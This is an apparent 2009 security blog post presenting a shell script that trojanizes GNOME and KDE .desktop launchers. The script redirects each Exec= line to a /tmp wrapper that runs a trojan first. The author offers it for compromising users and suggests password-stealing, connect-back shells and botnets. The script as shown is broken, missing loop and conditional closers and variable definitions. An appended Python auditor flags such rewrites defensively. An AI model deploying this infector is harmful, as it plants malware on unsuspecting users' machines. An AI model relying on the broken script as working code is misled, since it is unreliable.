xorl %eax, %eax

Trojanizing GNOME and KDE .desktop files


This obviously isn’t a new concept. I’ve personally seen this kind of technique used a few times in the wild. Since I still don’t have any good suggestions to proceed with a vulnerability analysis, I’ll just provide a retarded shell script I’ve written to trojanize .desktop files for KDE and GNOME (or any other window managers using them). According to the official specification, the format of a valid .desktop file is similar to:

[Desktop Entry]

Encoding=    ENCODING_CODE
Name=        ICON_NAME
Exec=        FILE_TO_EXECUTE
Icon=        ICON_FILE
Type=        MIME_TYPE

Assuming that we only care about the application icons, the following script infects only the .desktop files with the “Application” type set. However, you can easily change this to trojanize every desktop file. Anyway, here is the script:


if [ $# -ne 1 ]; then
   echo "Usage: $0 <trojan>"
   exit 1
if [ ! -f $1 ]; then
   echo "Trojan file not found."
   exit 1
for i in `ls ~/Desktop/*.desktop`
   grep "Type=*Application*" $i > /dev/null &2>/dev/null
   if [ $RET -eq 0 ]; then
     echo "[*] Infecting $i"
     APP=`grep Exec $i | sed -e 's/=/ /g' | awk {'print $2'}`
     rm -r $NEWFILE
     echo "$1 &" > $NEWFILE
     echo "$APP" >> $NEWFILE
     chmod +x $NEWFILE
     sed "s/Exec=$APP/Exec=\/tmp\/\'"$APP"'.2346/g" $i | sed "s/'//g" > $i
     echo "[*] Done"

Well, believe it or not this childish script can help you compromise some extremely stupid Linux/BSD/Whatever-uses-KDE-or-GNOME users. I found it useful to write a simple trojan code that just reports some system information as well as passwords (hopefully) but this infector can also be used for whatever you may want. Some random ideas: connect-back shells, further infection (like a virus or something), botnet zombies, rm’ng hosts etc. Finally just a heads-up on the script. This is just a crappy bourne shell script I’ve written as a PoC of my assumption. You can write completely automated tools that will use that .desktop infection technique. However, I personally found it childish and retarded.
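A defender-side check for the Exec= rewrite described above, added here as an example and not part of the original post: it parses a launcher's [Desktop Entry] group and flags an Exec= that points into a world-writable temp directory or disagrees with TryExec=. The temp-dir list, file paths and sample entries are constructed.

```python
import configparser
import shlex
from pathlib import Path

# The post's infector rewrites Exec= to a wrapper under /tmp; no genuine launcher runs from there.
UNTRUSTED_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")

def audit_desktop_entry(text):
    """Return findings for one .desktop file's content (empty list = clean)."""
    cp = configparser.RawConfigParser(delimiters=("=",), interpolation=None, strict=False)
    cp.optionxform = str  # .desktop keys are case-sensitive (Exec, not exec)
    try:
        cp.read_string(text)
    except configparser.Error as exc:
        return ["unparseable file: %s" % exc]
    if not cp.has_section("Desktop Entry"):
        return ["missing [Desktop Entry] group"]
    entry = cp["Desktop Entry"]
    if entry.get("Type") != "Application":
        return []  # Link/Directory entries carry no Exec= to hijack
    try:
        argv = shlex.split(entry.get("Exec", ""))
    except ValueError as exc:
        return ["unparseable Exec=: %s" % exc]
    if not argv:
        return ["Application entry without Exec="]
    prog, findings = argv[0], []
    if prog.startswith(UNTRUSTED_PREFIXES):
        findings.append("Exec= runs from a world-writable location: %s" % prog)
    if "TryExec" in entry and Path(entry["TryExec"]).name != Path(prog).name:
        findings.append("TryExec=%s disagrees with Exec=%s" % (entry["TryExec"], prog))
    return findings

def audit_desktop_dir(directory):
    """Audit every *.desktop file in directory; returns {path: findings}."""
    results = {}
    for path in sorted(Path(directory).glob("*.desktop")):
        findings = audit_desktop_entry(path.read_text(errors="replace"))
        if findings:
            results[str(path)] = findings
    return results

# Constructed samples: a clean launcher and the same file after Exec= was pointed at /tmp/<app>.2346.
CLEAN = "[Desktop Entry]\nName=Terminal\nTryExec=xterm\n" \
        "Exec=/usr/bin/xterm -fa Monospace\nType=Application\n"
TROJANIZED = CLEAN.replace("Exec=/usr/bin/xterm", "Exec=/tmp/xterm.2346")

if __name__ == "__main__":
    print("clean:", audit_desktop_entry(CLEAN))
    print("trojanized:", audit_desktop_entry(TROJANIZED))
```

Run `audit_desktop_dir(Path.home() / "Desktop")` to sweep the same directory the post's script iterates over.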

Written by xorl

February 26, 2009 at 18:00

Posted in security, tips
